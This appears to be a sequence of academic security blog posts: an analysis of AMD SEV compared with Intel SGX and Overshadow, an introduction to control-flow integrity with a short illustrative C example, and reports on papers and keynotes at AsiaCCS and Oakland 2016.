The VMM presents two different memory views to executing code, depending on the privilege level. Whenever the OS accesses pages application-level pages, they are encrypted, protecting integrity and confidentiality of the data. The VMM allows the application process to access the unmodified pages but whenever the OS accesses the pages, they are transparently encrypted. This allows the OS to still handle memory allocation and bookkeeping but keeps the contents of the memory pages hidden. The cloaking/uncloaking operations are implemented at the VMM level.

A caveat of Overshadow is that several core features of the operating system had to be reimplemented at the VMM level, increasing the porting and development effort as well as attack surface. The cloaking of the address space at the OS level stops the OS from accessing any memory contents of the application and all system calls that need such access have to be trapped and emulated at the VMM level. In the end, the guest has to call into the VMM for functions like pipes, file access, signal handling, or thread creation. Overshadow showed that it is immensely challenging to remove trust from a higher-privileged component and, to secure the lower level, one has to reimplement several features of the higher-privileged component at an even higher trust level, circumventing the now untrusted component. For Overshadow, several OS components had to be reimplemented at the still trusted VMM level when the OS became untrusted.

Intel Software Guard Extensions (SGX)

Intel SGX [4] allows so-called enclaves to execute orthogonally and protected from the BIOS, VMM, and OS, removing these components from the trusted computing base. An enclave is part of a user-space process that contains a set of pages. SGX guarantees that a software module and its data are protected from the untrusted environment and can compute on confidential data. The pages of the enclave are encrypted to the outside but are accessible inside the enclave. An enclave is initialized by loading pages into a new enclave, followed by an attestation. SGX guarantees integrity and confidentiality but the VMM or OS control scheduling and memory, thereby controlling availability.

SGX was carefully designed to reduce the interaction between the untrusted components and the trusted components. The untrusted components control scheduling and to some extent memory (as the OS/VMM controls how many pages are mapped to the enclave). The user-space untrusted component of the enclave controls I/O to the enclave using a per-enclave I/O channel, e.g., a shared page. The code in the enclave is explicitly designed with this attacker model and assumes that data coming form the outside is not trusted, vetting any incoming data.

The main attack vector against SGX are side channels, trying to constrain the amount of pages available to the enclave on the software side or observing cache line fetches on the hardware side to learn access patterns of code and data in the enclave.

AMD Secure Encrypted Virtualization (SEV)

AMD SEV [1] protects the memory of each VM and the VMM using an individual encryption key, managed by the hardware [3]. The VMM therefore does not have access to the decrypted contents of the guest VM. The VMM remains in control of the execution of the guest VM in terms of (i) memory management, (ii) scheduling, (iii) I/O control, and (iv) device management. Both the VMM and the guest VM must be aware of this new security feature and cooperatively enable it.

When the guest enables SEV, there is a form of attestation that certifies, using a root of trust that AMD controls, that the VMM actually plays along and allows this feature (and does not just emulate it using a software implementation on top of, e.g., QEMU). Interestingly, for SEV, the data is encrypted (protecting confidentiality) but not integrity protected. The missing integrity protection allows replay attacks on the crypto level.

In such a mutually-distrusting scheme not all memory can be encrypted and data must be passed between isolated components using some form of I/O channel. In addition, there must be a way to branch somewhere into the other component. The VM obviously needs to request I/O from the VMM and interact with the exported emulated or para-virtualized hardware. In addition, several locations of the VM need to be exposed to, e.g., deliver exceptions and interrupts.

Security discussion

SEV is similar to Overshadow and SGX as it removes trust from a higher privileged component. Overshadow still trusts the memory bus, BIOS, and the VMM while SEV and SGX only trust the AMD or Intel CPU. The two main differences between SEV and SGX is the amount of code that sits in a protected module and the intersection between the two privilege domains. SGX places the trusted enclave outside of all execution domains, orthogonally to existing privilege levels. Any interaction of the trusted enclave with the untrusted system needs to go through a narrow interface that can be carefully vetted. SEV removes trust from the VMM with all the potential downsides that Overshadow experienced as well. All existing code in the OS and the applications are now part of the broader attack surface (side-channel wise) and all interaction between the OS and the VMM may be attacked or observed by an adversary.

While for SGX, there is a clear cut between privilege domains, forcing developers to design a small API to communicate between privileged and unprivileged compartments and the amount of code in the trusted compartment is "as small as possible", SEV seems bloated.

First off, operating systems inherently trust all higher privileged levels. The OS must trust any higher privileged level as, due to the hierarchical design, all depends on that higher level. Breaking this assumption may lead to unexpected security issues.

An SEV domain does not trust the VMM but the VMM may control data that is being passed into the VM and scheduling of the VM. This allows targeted time-of-check-to-time-of-use attacks where data is modified by the VMM after the VM has checked it but before it is being used. This is a very strong attack vector as code has to be designed with such malicious changes in mind. The code of individual device drivers, I/O handlers, interrupt drivers are not designed with an active, higher-privileged adversary in mind. In addition, the code base is large, complex, and grew over many years. An adversary who leverages this attack vector can likely mount a ROP/JOP attack or even inject code to get control of the underlying VM and then simply extract the data through the existing I/O channels or spawn a remote shell. Now, AMD promises to develop virtio drivers for, e.g., KMU to handle at least the data transfer for (some?) I/O devices. What happens to all other interactions remains unclear. Second, the large code base of the VM will simplify information leaks and side channels.

I predict that we as the security community will find plenty of vulnerabilities in this layer now that the trust is revoked. As SEV will be used in secure clouds, the data and code will likely become a high profile target. As a hacker, I only see large amounts of code suddenly being adversary accessible as the definition of what an adversary can do suddenly changed with much more code and data being accessible.

Intel stepped around this problem by placing the enclave orthogonally to all privilege domain, thereby not breaking these trust assumptions of existing code. If you want to use SGX, you will have to design the interface between trusted and untrusted code while being aware of the attacker model. For SEV, the attacker model just changed.

Note that so far only limited information is known and I'm basing my analysis on the publicly available documents. I could be completely wrong about this, so please comment and let me know your thoughts. Overall, this is an interesting technology but I'm weary about the newly exposed attack surface.

Changelog

09/24/16 Jethro Beekman (@JethroGB) mentioned integrity attacks against AMD SEV.
09/24/16 twiz (@lazytyped) asked to clarify the ROP attack vector.

[1]	(1, 2, 3) AMD's Virtualization Memory Encryption. Thomas Lendacky. KVM Forum'16

[2]	Brijesh Singh. x86: Secure Encrypted Virtualization (AMD). LKML'16

[3]	David Kaplan, Jeremy Powell, and Tom Woller. AMD MEMORY ENCRYPTION. Technical Report. 2016.

[4]	(1, 2) Intel Software Guard Extensions.

[5]	(1, 2) Xiaoxin Chen, Tal Garfinkel, E. Christopher Lewis, Pratap Subrahmanyam, Carl A. Waldspurger, Dan Boneh, Jeffrey Dwoskin, and Dan R.K. Ports. Overshadow: A Virtualization-Based Approach to Retrofitting Protection in Commodity Operating Systems. ASPLOS'08

Control-Flow Integrity: An Introduction

2016-09-13T16:28:00-04:00

At a high level, Control-Flow Integrity (CFI) restricts the control-flow of an application to valid execution traces. CFI enforces this property by monitoring the program at runtime and comparing its state to a set of precomputed valid states. If an invalid state is detected, an alert is raised, usually terminating the application. As such, CFI belongs to the class of defenses that leverage runtime monitors to detect specific attack vectors (control-flow hijacks for CFI), and then flag exploit attempts at runtime. Other examples of runtime monitors include, e.g., ASan (Address Sanitizer, targeting spatial memory corruption), UBSan (Undefined Behavior Sanitizer, targeting undefined behavior in C/C++), or DangNull (targeting temporal memory corruption). Most of these monitors target development settings, detecting violations when testing the program. CFI, on the other hand, is an active defense mechanism and all modern compilers, e.g., GCC, LLVM, or Microsoft Visual Studio implement a form of CFI with low overhead but different security guarantees.

CFI detects control-flow hijacking attacks by limiting the targets of control-flow transfers. In a control-flow hijack attack an attacker redirects the control-flow of the application to locations that would not be reached in a benign execution, e.g., to injected code or to code that is reused in an alternate context.

Since the initial idea for the [1] defense mechanism and the first (closed source) prototype were presented in 2005 a plethora of alternate CFI-style defenses were propose and implemented. While all these alternatives slightly change the underlying enforcement or analysis, they all try to implement the CFI policy. The goal of this blog post is neither to look at differences between individual CFI mechanisms as we did in [2] (see this paper for an exhaustive enumeration of related work in the area of CFI) nor to compare CFI against alternate mechanisms as we did in [3], but to explain what CFI is, what it can do, and what its limits are.

Any CFI mechanism consists of two abstract components: the (often static) analysis component that recovers the Control-Flow Graph (CFG) of the application (at different levels of precision) and the dynamic enforcement mechanism that restricts control flows according to the generated CFG.

The following sample code shows a simple program with 5 functions. The foo function uses a function pointer and the CFI mechanisms injects both a forward-edge and a backward-edge check. The function pointer either points to bar or baz. Depending on the forward-edge analysis, different sets of targets are allowed at runtime.

void bar();
void baz();
void buz();
void bez(int, int);

void foo(int usr) {
  void (*func)();

  // func either points to bar or baz
  if (usr == MAGIC)
    func = bar;
  else
    func = baz;

  // forward edge CFI check
  // depending on the precision of CFI:
  // a) all functions {bar, baz, buz, bez, foo} are allowed
  // b) all functions with prototype "void (*)()" are allowed,
  //    i.e., {bar, baz, buz}
  // c) only address taken functions are allowed, i.e., {bar, baz}
  CHECK_CFI_FORWARD(func);
  func();

  // backward edge CFI check
  CHECK_CFI_BACKWARD();
}

Control-Flow Transfer Primer

Instructions on an architecture can be grouped into control-flow transfer instructions and computational instructions. Computational instructions are executed in sequence (one after the other), while control-flow transfer instructions change control-flow in a specific way, conditionally or unconditionally redirecting control-flow to a specific (code) location.

Control-flow transfer instructions can be further grouped into direct and indirect control-flow transfer instructions. The target of indirect control-flow transfers depends on the runtime value, e.g., of a register or a memory value, compared to direct control-flow transfers where the target is usually encoded as immediate offset in the instruction itself.

Direct control-flow transfers are straight-forward to protect as, on most architectures, executable code is read-only and therefore the target cannot be modified by an attacker (even with arbitrary memory corruption as the write protection bit must first be disabled). These direct control-flow transfers are therefore protected through the read-only permission of individual memory pages and the protection is enforced (at no overhead) by the underlying hardware (the memory management unit). CFI assumes that executable code is read-only, otherwise an attacker could simply overwrite code and remove the runtime monitors.

Indirect control-flow transfers are further divided into forward-edge control-flow transfers and backward-edge control-flow transfers. Forward-edge control-flow transfers direct code forward to a new location and are used in indirect jump and indirect call instructions, which are mapped at the source code level to, e.g., switch statements, indirect calls, or virtual calls. The backward-edge is used to return to a location that was used in a forward-edge earlier, e.g., when returning from a function call through a return instruction. For simplicity, we leave interrupts, interrupt returns, and exceptions out of the discussion.

Generating Control-Flow Graphs

A CFG is a graph that covers all valid executions of the program. Nodes in the graph are locations of control-flow transfers in the program and edges encode reachable targets. The CFG is an abstract concept and the different existing CFI mechanisms use different approaches to generate the underlying CFGs using both static and dynamic analysis, relying on either the binary or source code.

For forward edges, the CFG generation enumerates all possible targets, often leveraging information from the underlying source language. Switch statements in C/C++ are a good example as the different targets are statically known and the compiler can generate a fixed jump table and emit an indirect jump with a bound check to guarantee that the target used at runtime is one of the valid targets in the switch statement.

For indirect function calls through a function pointer, the underlying analysis becomes more complicated as the target may not be known a-priori. Common source-based analyses use a type-based approach and, looking at the function prototype of the function pointer that is used, enumerate all matching functions. Different CFI mechanisms use different forms of type equality, e.g., any valid function, functions with the same arity (number of arguments), or functions with the same signature (arity and equivalence of argument types). At runtime, any function with matching signature is allowed.

Just looking at function prototypes likely yields several collisions where functions are reachable that may never be called in practice. The analysis therefore over-approximates the valid set of targets. In practice, the compiler can check which functions are address taken, i.e., there is a source line that generates the address of the function and stores it. The CFI mechanism may reduce the number of allowed targets by intersecting the sets of equal function prototypes and the set of address taken functions.

For virtual calls, i.e., indirect calls in C++ that depend on the type of the object and the class relationship, the analysis can further leverage the type of the object to restrict the valid functions, e.g., all object constructors have the same signature but only the subset constructors of related classes are feasible.

So far, the constructed CFG is stateless, i.e., the context of the execution is not considered and each control-flow transfer is independent of all others. On one hand, at runtime only one target is allowed for any possible transfer, namely the target address currently stored at the memory location of the code pointer. CFG construction, on the other hand, over-approximates the number of valid targets with different granularities, depending on the precision of the analysis. Some mechanisms take path constraints into consideration and check (for a limited depth) if the path taken through the application is feasible by using a dynamic analysis approach that validates the current execution. So far, only few mechanisms look at the path context as this incurs dynamic tracking costs at runtime.

Enforcing CFI

CFI can be enforced at different levels. Sometimes the analysis phase (CFG construction) and enforcement phase even overlap, e.g., when considering path constraints. Most mechanisms have two fundamental mechanisms, one for forward-edge transfers and one for backward-edge transfers.

The figure shows how CFI restricts the set of possible target locations by executing a runtime monitor that validates the target according to the constructed set of allowed targets. If the observed target is not in that set, the program terminates.

For forward-edge transfers, the code is often instrumented with some form of equivalence check. The check ensures that the target observed at runtime is in the set of valid targets. This can be done through a full set check or a simple type comparison that, e.g., hashes function prototypes and checks if the hash for the current target equals the expected hash at the callsite. The hash for the function can be embedded inline in the function, before the function, or in an orthogonal metadata table.

Backward-edge transfers are harder to protect as, when using the same approach, the attacker may redirect the control-flow to any valid callsite when returning from a function. Strong backward-edge protections therefore leverage the context through the previously called functions on the stack. A mechanism that enforces stack integrity ensures that any backward-edge transfers can only return to the most recent prior caller. This property can be enforced by storing the prior call sites in a shadow stack or guaranteeing memory safety on the stack, i.e., if the return instructions cannot be modified then stack integrity trivially holds. Backward-edge control-flow enforcement is "easier" than forward-edge, as the function calls and returns form a symbiotic relationship that can be leveraged in the design of the defense, i.e., a function return always returns to the location of the previous call. Such a relationship does not exist for the forward-edge.

Summary

If implemented correctly, CFI is a strong defense mechanism that restricts the freedom of an attacker. Attackers may still corrupt memory and data-only attacks are still in scope. For the forward-edge, a strong mechanism must consider language-specific semantics to restrict the set of valid targets as much as possible. Additionally, most mechanisms for the forward-edge are stateless and allow an attacker to redirect control-flow to any valid location as identified by the CFG construction. Limiting the size of the target sets constrains the attacker on the forward edge. For the backward edge, a context-sensitive approach that enforces stack integrity guarantees full protection.

[1]	Control-Flow Integrity. Martin Abadi, Mihai Budiu, Ulfar Erlingsson, Jay Ligatti. In CCS'05

[2]	Control-Flow Integrity: Precision, Security, And Performance. Nathan Burow, Scott A. Carr, Stefan Brunthaler, Mathias Payer, Joseph Nash, Per Larsen, Michael Franz

[3]	On differences between the CFI, CPS, and CPI properties. Mathias Payer and Volodymyr Kuznetsov

AsiaCCS and China

2016-06-21T16:56:00-04:00

The last three weeks I've been traveling through China, Hong Kong, and Macau on an interesting security tour thanks to this year's AsiaCCS being held in Xi'an, China. AsiaCCS was right after Oakland, so I flew directly from San Francisco to Xi'an China and then continued to visit friends at Beijing, Shanghai, and Hong Kong/Macau. Overall, Asia has been a breathtaking experience with an immense set of impressions that I'll try to summarize in a country-specific blog post. Here, I'll focus on the research aspects and the conference.

AsiaCCS is in the process of migrating from a symposium to a full conference. While not exactly in the big four, the conference is still fairly competitive and has a tendency to accept good papers that just did not make it at the big four. One of the challenges, shared with CCS proper, is that there is no physical PC meeting and therefore no overall quality control and discussion of the papers. This shows, in my opinion, in the slightly higher randomness in paper selection that we see each year compared to conferences that have real on-site PC meetings.

This was my first AsiaCCS and I left with an OK impression. The conference was fairly well organized with an exciting dinner and great people to talk to. Compared to the big four, AsiaCCS has the problem that many people only attend for a day and then head off for sight-seeing, so if you want to meet with others you actively have to coordinate (compared to other conferences where you'll just walk into each other by accident as, let's be honest, San Jose does not have that much to offer for tourists). On the downside, Internet is a mess in China with lots of sites blocked, connections timing out, and even VPN sessions being randomly killed and subverted by the great firewall. After a couple of annoying weeks I found out that an SSH SOCKS proxy works much better than OpenVPN.

On the paper site, I attended all interesting sessions and also asked my fair share of questions. There were a bunch of interesting papers and keynotes that I'll discuss below. In general, I enjoyed the diverse keynotes, especially Michael Backes' call for privacy research and Giovanni Vigna's shameless plug for angr and collaborative systems research.

TouchAlytics

Let me begin this blog post with a shameless plug of our TouchAlytics work. We finally published our TouchAlytics paper at AsiaCCS (slides) and I was the only author who was willing and managed to get a visa for China. In our paper we propose a forgery-resistant touch-based authentication method that uses how people react and adapt to different environments as biometrics instead of something people "have" as in classical biometrics.

Our authentication method samples a user in different environments (that we control) and then uses this information to subtly and continuously change the underlying environment. As the user adapts her behavior, she is authenticated against the different profiles we collected. As attackers do not know what environment is used during the authentication, they cannot forge an authentication, even with perfect information of all possible environments.

In our prototype we add an adaptive layer between the touchscreen sensor and the display that allows us to stretch individual strokes into both dimensions. The application therefore receives slightly different strokes than the user executes on the touchscreen. Due to the different app behavior the user will adapt her strokes accordingly and we use this adaptation to identify and authenticate the user based on the slight variances. Our authentication framework is both stable and sensitive, i.e., it allows us to differentiate between different settings for a single user and between different users. This work moves biometrics from a "what you have" to a "how you react"-based authentication.

An angr'y keynote

The best talk at AsiaCCS was Giovanni's angr'y keynote in my opinion. Based on the premise that hacking is awesome, Giovanni and his group want to automate awesomeness. Hacking can be manifold and can involve hacking the user through social engineering, hacking the process through weak password resets, weak PINs, or bruteforce attacks, or hacking the code. Hacking the code is the most involved as actual knowledge and intelligence is needed. The question is if we can incorporate the domain knowledge and intelligence into a tool. Angr is a framework that tries to achieve that.

Binary code on the one hand is incredibly difficult as it has a (very) low abstraction level, no structured types, no modules and no defined functions. In addition, compiler optimizations make code very complex. On the other hand, binary code is truthful, what you see is what you execute. In manual vulnerability analysis, a very intelligent person stares at the code and sees what she can find. This approach discovers deep and complex vulnerabilities but does not scale. The holy grail of vulnerability research is a magic tool that, when run, finds the vulnerability and develops a patch/exploit for it.

Automatic vulnerability analysis systems have a high level policy and try to force violations. Such an approach requires replayability, i.e., the ability to generate attack instances. These systems try to generate inputs that, when fed to the program generate a violation. Such a violation is then a proof-of-concept exploit (depending on the high level policy). An orthogonal aspect is semantic insight, i.e., the ability to understand the root cause of the crash which will allow the attacker to abstract and generalize from the single fault.

A problem that automatic vulnerability analysis systems face is that high replayability implies low coverage, low replayability implies false positives, semantic insight implies high overhead, replayability and semantic insight imply low scalability and lack of soundness which result in false negatives. Therefore heuristics need to balance between these different options to achieve good results. Both static and dynamic analyses can be used to evaluate the search space.

Static analysis has the advantage of high coverage but is complex and runs into the aliasing problem. Dynamic analysis on the other hand has high replayability, does not worry about aliasing but runs into coverage problems. So far, angr focused on a binary analysis toolkit, providing static analysis and symbolic execution. For the DARPA cyber grand challenge, the UC Santa Barbara folks extended angr and combined angr and AFL intro Driller. Surprisingly, fuzzing is the most effective technique at finding bugs. Generating random inputs and feeding those into a program discovers a large amount of vulnerabilities but has the tendency to get stuck with limited coverage. AFL tries to address the coverage problem through a path-guided analysis that records which paths were already evaluated and forces input mutations to evaluate alternate paths. In Driller, whenever AFL gets stuck it evaluates the paths using symbolic execution to find alternate inputs that trigger new paths.

In the later part of the keynote, Giovanni also talked about some details of the cyber grand challenge, infrastructure availability (never segfault your infrastructure), analysis scalability (how to cope with limited resources), and the performance/security trade-off.

In our current system the attacker is at an inherent advantage as it takes one single vulnerability to bring down a system but the defender needs to cover all bases. We need to move forward as a community to provide better analysis tools and better general defense techniques that actually hold up to attacks.

Automatic Dynamic Firmware Analysis at Scale: A Case Study on Embedded Web Interfaces

In this work, Andrei Costin, Apostolis Zarras, and Aurelien Francillon extend their framework for automatic firmware collection and extraction. In addition to searching for simple bugs using pattern matching, the now force run the images inside QEMU and run the web interface in the image. Their existing infrastructure already collects information and extracts the individual files of the firmware. They have now built a QEMU emulator that runs some of the binaries in the firmware. Many IoT devices like routers primarily run a single suid/root binary that encapsulates all the functionality of the device.

After getting the binary to run through some hackery, they run basic vulnerability discovery and penetration testing tools to find vulnerabilities in the services and had good results. A problem they ran into was that those service binaries often have hardware specific calls and kernel issues that reduce their coverage.

In the last year we (Craig West, Jacek Rzeniewicz, and myself) have looked at a similar problem. We got stuck at the same location where the service binaries were calling into the kernel or reading/writing privileges flash areas that we could not easily emulate. Also, instead of running simple penetration testing tolls it would be much more interesting to run something like AFL. We have tried integrating AFL into our own QEMU-based framework (yeah, we went down almost the same path in our research) but could not get the path-based feedback to work and AFL was therefore limited in the input it could generate. This might be an interesting project to continue, so if anyone is interested, please reach out.

ORIGEN: Automatic Extraction of Offset-Revealing Instructions for Cross-Version Memory Analysis

An interesting challenge for forensics tools is to recover data structures from memory images. Unfortunately, these data structures change as new fields are added or removed whenever software evolves. The fingerprints are therefore tied to specific software versions.

Qian Feng, Aravind Prakash, Minghua Wang, Curtis Carmony, and Heng Yin evaluated how software evolves and how structures change between releases. They line up code that accesses the same struct and evaluate the offsets of individual instructions. As the offsets change across releases they can recover the different offsets and therefore discover the changes in the struct by simply lining up the code that accesses the same struct and evaluating the different offsets.

During the Q and A I wondered how resilient the approach is to changes in compiler settings and across compiler optimizations. This will unfortunately disrupt the tracking and pose some difficulties, so more research is needed in that regard. Nevertheless, this work is an interesting approach to this challenge.

Preventing Page Faults from Telling your Secrets

For SGX, the operating system manages individual memory pages of enclaves. This enables a side channel where the OS restricts the amount of pages an enclave gets and learns which pages are accessed.

Shweta Shinde, Zheng Leong Chua, Viswesh Narayanan, and Prateek Saxena present a compiler-based defense against such pigeon-hole attacks that makes all page accesses deterministic. The defense assumes that the OS cannot distinguish between accesses on a single page (i.e., OS cannot learn the offset in the page, just the page itself). Make program page fault oblivious.

The programmer then marks which part of the program is hardened against attacks and marks code and data that is accessed. The compiler then rearranges code and data on that page. Code and data are then moved onto staging pages before they are used and only executed/accessed from those pages. The programmer controls selective optimization and everything is hand tuned. Such an approach is a simple solution but does not scale to larger code bases and involves a lot of manual effort. A hardware-based extension allows an application to enforce a contract that specific pages cannot be unloaded and the enclave is then informed about page faults (such a mechanism is available in newer SGX versions.

While individual accesses are no longer observable, copying code and data to staging pages still leaks information. In addition, the programmer effort will reduce automation and will make it hard to deploy such a defense. While the work presents an interesting start, I wonder about how much more this can be automated and how effective the side-channel reduction is in practice (e.g., for larger applications).

Cross Processor Cache Attacks

In this attack paper, Gorka Iraqzoqui, Thomas Eisenbarth, and Berk Sunar present an interesting side channel that is based on the cache coherency protocol instead of cache access times. All existing cache side channels like flush and reload or prime and probe rely on inclusiveness and will not port to other architectures like AMD. The authors target exclusive last level caches as present on AMD architectures. Their attack enables a cross-CPU attack called invalidate and transfer.

The attack uses the cache coherency protocol to invalidate a memory block (flushing the block from all caches) and then waits for computation to happen. Afterwards, the same block is requested again and the access time is measured. If another CPU has already requested the block then the transfer time is lower than refreshing it from DRAM, resulting in a side-channel.

ROPMEMU: A Framework for the Analysis of Complex Code-Reuse Attacks

Mariano Graziano, Davide Balzarotti, and Alain Zidouemba present a framework to analyze ROP attacks. ROP attacks are incredibly difficult to understand as the control flow is immensely complex. ROPEMU uses heuristics to map ROP gadgets into equivalent instructions. Individual ROP gadgets are decompiled and matched into individual simplified instructions based on a set of heuristics based on flattening and simplification.

While this works on some examples, the approach has not yet been tested on larger ROP frameworks and ROP programs. Also, the heuristics will likely break for arbitrary programs and will need more work. I wonder if such generalized gadget decompilation is even possible in the general case. The problem they address is interesting and their framework does well for simple attacks (thereby adding value). On the other hand, I wonder how generalizable the results are to arbitrary (hand crafted) ROP programs as they are even more difficult to analyze, simplify, and decompile than decompiling handwritten assembly programs into, e.g., C.

Defenses likely to be broken soonish

In addition to the above mentioned attacks and defenses, AsiaCCS also had a fair share of incremental defenses that are likely to be broken at the next conference. In "Juggling the Gadgets: Binary-level Code Randomization using Instruction Displacement", Hyungjoon Koo and Michalis Polychronakis assume that fine-grained instruction randomization is in place and they target some remaining static sequences, trying to complete the randomization and to protect against, e.g., JIT-ROP attacks. Unfortunately, 2.5% of gadgets remain which is likely enough for an attacker to carry out an attack (as we've seen with coarse-grained CFI protections). Therefore, I'm not too optimistic about this defense. It extends a complicated defense mechanism even more and still leaves a large set of remaining gadgets at the attackers disposal.

In "No-Execute-After-Read: Preventing Code Disclosure in Commodity Software", Jan Werner, George Baltas, Rob Dallara, Nathan Otternes, Kevin Snow, Fabian Monrose, and Michalis Polychronakis present another mechanism to protect against JIT-ROP attacks that relies on destructive code reads. As the same set of authors just showed at Oakland 2 weeks before this conference, such protections are broken by design as an attacker can (i) find a prefix before the gadget to find the actual gadget, (ii) reload libraries after gadget discovery, or (iii) generate multiple equal gadgets through, e.g., JavaScript. This defense is, as-is, broken before publication (by the same authors).

Oakland from a system security perspective

2016-06-20T08:56:00-04:00

This year's Oakland (the IEEE Symposium on Security and Privacy, formerly held in Oakland, California) has been a wild ride. Just a little more than a week before Oakland I've been in the bay area at the Usenix Security PC meeting at Google in Mountain View, talking to many folks I saw again at Oakland. A little unfortunately, the deadline for CCS overlapped with the Oakland conference, so most folks were pretty busy wrapping up their CCS submissions during at least the first day of Oakland (and up into the night as the CCS deadline was 4am local time).

As I am getting scientifically more mature ("older"), the individual paper presentations become less important (as I've likely already read the ones in my core area and skimmed the ones that I'm otherwise interested in). Nowadays, meeting other folks aka the hallway track dominates my conference schedule. One skill I'm still terrible at is introducing people and finding good seats with interesting folks during lunches and dinners. I guess, that's just part of my introvert legacy and a skill that I have to become better at.

It was interesting to catch up with old friends and also to meet other colleagues. Several important topics stood out and were discussed multiple times across many dimensions: (i) review culture in system security, (ii) moving towards a rolling submission model, and (iii) benchmarking (crimes) in system security. All these topics carry a lot of tension from different angles and therefore warrant their own blog posts. Bear with me and stay tuned.

At the beginning of the conference, Ulfar Erlingsson gave a great peek into the review culture and fed us some interesting statistics. Oakland had 411 initial submissions whereas 399 received two initial reviews (the others were dropped due to format issues). Out of the 399 submissions, 205 made it to round 2, the others received early rejects. 98 papers then continued to round 3 and 55 were accepted as part of the PC discussion. What surprised me a little was that there were only few Systematization of Knowledge papers in the program. I wonder if there were just fewer submitted or if the review was more competitive for them.

Despite the interesting and tempting hallway track (and the CCS deadline), I tried to attend as many talks related to system security as I could. Overall, there were several talks that made the conference worthwhile. I've also added a large set of the talks to the proposed reading list for the system security seminar in fall semester. Some of the papers, I'd like to quickly highlight, hopefully encouraging others to go read the underlying papers and start a more open discussion.

SoK: (State of) The Art of War: Offensive Techniques in Binary Analysis

In this "survey" paper, Yan Shoshitaishvili, Ruoyu Wang, Christopher Salls, Nick Stephens, Mario Polino, Andrew Dutcher, John Grosen, Siji Feng, Christophe Hauser, Christopher Kruegel, and Giovanni Vigna present their angr framework. Angr is basically a reimplementation of the state of the art of binary analysis techniques and a combination of static analysis and symbolic execution techniques. At the core, angr is built to have a large set of flexible modules that can be combined in different ways, e.g., a dynamic loader can be used to analyze the structure of a binary that is then passed to a disassembler where a symbolic execution engine then tries to fine a satisfying assignment of the program representation of a function to trigger a vulnerability condition. The whole platform is implemented in Python and relies on VEX to disassemble binary blobs. Building on VEX has the advantage that a large set of architectures are supported and allows cross-platform binary analysis.

The strength of angr lies in the compositional framework, allowing a user to build up a sophisticated analysis platform based on a set of reusable modules. Compared to other binary analysis toolkits that exist, angr is open-source and can be repurposed and retargeted to other tasks. So far, a lot of research has focused on single-task binary analysis platforms that are not compositional and cannot be repurposed to vastly different tasks. Each new research question forced users to build a new prototype implementation, often starting from scratch. Angr is a step towards an open platform of binary analysis engines.

What I am wondering is, if VEX is the optimal format for binary analysis. Several formats have been proposed and used in different prototypes (VEX, BAP IR, QEMU Tiny Code, and many other ad hoc formats). These intermediate representations are usually rather low level and close to an RISC-like ISA to reduce complexity (CISC is so incredibly complex and vast that nobody wants to design an IR that is complex enough to capture all of it). Especially for x86/x86-64, there is a lot of translation overhead going down and up again which makes efficient analysis difficult. I wonder if we should look into better low level intermediate representations, especially as the x86 architecture will stick with us for a while.

A Tough call: Mitigating Advanced Code-Reuse Attacks At The Binary Level

After their PathArmor paper from last year, Victor van der Veen and Enes Goktas, Moritz Contag and Andre Pawlowski, Xi Chen, Sanjay Rawat, Herbert Bos, Thorsten Holz, and Elias Athanasopoulos and Cristiano Giuffrida present an extension of the Control-Flow Integrity (CFI) policy presented there that increases the precision of the enforced policy. CFI is hard to get right as precision of the underlying policy is always a problem, especially for binaries. Source-based solutions usually compute a type-based approximation of a CFI policy that ensures tight bounds on each indirect call. For binary-only solutions, such rich type information is not available.

TypeArmor recovers as much of the function prototype information as possible, figuring out the arity of each function (i.e., how many arguments the function takes). For each call site, the same analysis concludes how many arguments are passed to the function and then the two pairs are matched. This analysis allows the distinction of CFI target classes based on the arity of functions, which is more precise than the lump set of all functions. This policy is comparable to Google's forward-edge arity CFI policy in IFCC that we looked at for our CFI survey paper. Different from Google's CFI policy, Victor et al. propose to trash any unused caller-saved register. The underlying assumption is that this hinders exploits as it makes it much harder for the attacker to keep control over register values across function calls. This aspect basically proposes a new calling convention that trashes any unused registers across function calls, making exploits less likely as the number of arguments will have to match the desired registers, adding another degree of complexity.

It might be interesting to explore such security-sensitive calling conventions on the compiler level as well. Clearing all unused and caller-saved registers before calling will increase the complexity of exploit development. I wonder how much this would increase actual security in practice and how we could quantify this increase.

Return of the Zombie Gadgets: Undermining Destructive Code Reads via Code-Inference Attacks

In a slightly weird turn of events, Kevin Z. Snow, Roman Rogowski, Fabian Monrose, Jan Werner, Hyungjoon Koo and Michalis Polychronakis presented the attack paper against destructive code reads before presenting their defense based on destructive code reads at AsiaCCS one week later. At the core, Kevin et al. claim that destructive code reads will not work as an attacker can always figure out a set of gadgets and then leverage relative offsets to create actual gadgets.

Fine-grained randomization defenses only work if the attacker cannot read the binary code using an information leak. Otherwise, the attacker would just leak the binary code and find the gadgets using dynamic ROP gadget finding (JIT-ROP). Unfortunately, code cannot easily be made execute-only as there is a lot of interleaving between code and data. The underlying assumption of destructive code reads is that instructions that read the code will destroy the underlying gadget as a side effect, i.e., after a code region has been read it cannot be executed or execution of that code region will trap. In that sense, destructive code reads are a protection against JIT-ROP to re-enable fine-grained randomization as an effective defense (seems as if we are layering hot-patches to mitigate different defenses here).

Not surprisingly, destructive code reads are not effective as an attacker who is interested in sequence A of bytes can search for the prefix B if she knows that BA exists in the program. If B is unique, reading B will allow the attacker to use gadget A which has not been compromised through the destructive read. The authors call this disassociation and code inference about gadget locations. In addition to disassociation, two alternative methods allow mitigation of destructive reads: singularity (generating the same gadgets all over again, i.e., through JIT gadget generation) and persistence (reloading a library after disclosure or across processes).

HDFI: Hardware-assisted Data-Flow Isolation

Data-Flow Integrity (DFI) protects software from corruptions based on data-flow. Only locations (instructions) that are allowed to write to a certain location are allowed to execute the actual write (or read). Castro et al. proposed DFI (OSDI'06) as a compiler-based enforcement mechanism. A static analysis used type inference to find equivalence classes, only instructions of the correct equivalence class are allowed to read/write a memory location. A runtime mechanism tracks equivalence classes for each memory location.

The HDFI paper by Chengyu Son, Hyungon Moon, Monjur Alam, Insu Yun, Byoungyoung Lee, Taesoo Kim, Wenke Lee, and Yunheung Paek, implements an ISA extension for Data-Flow Integrity. In the paper, the authors assume that a compiler-based type analysis assigns types (the pointer analysis is not their contribution). The tables are then checked using the new hardware instructions, significantly reducing overhead.

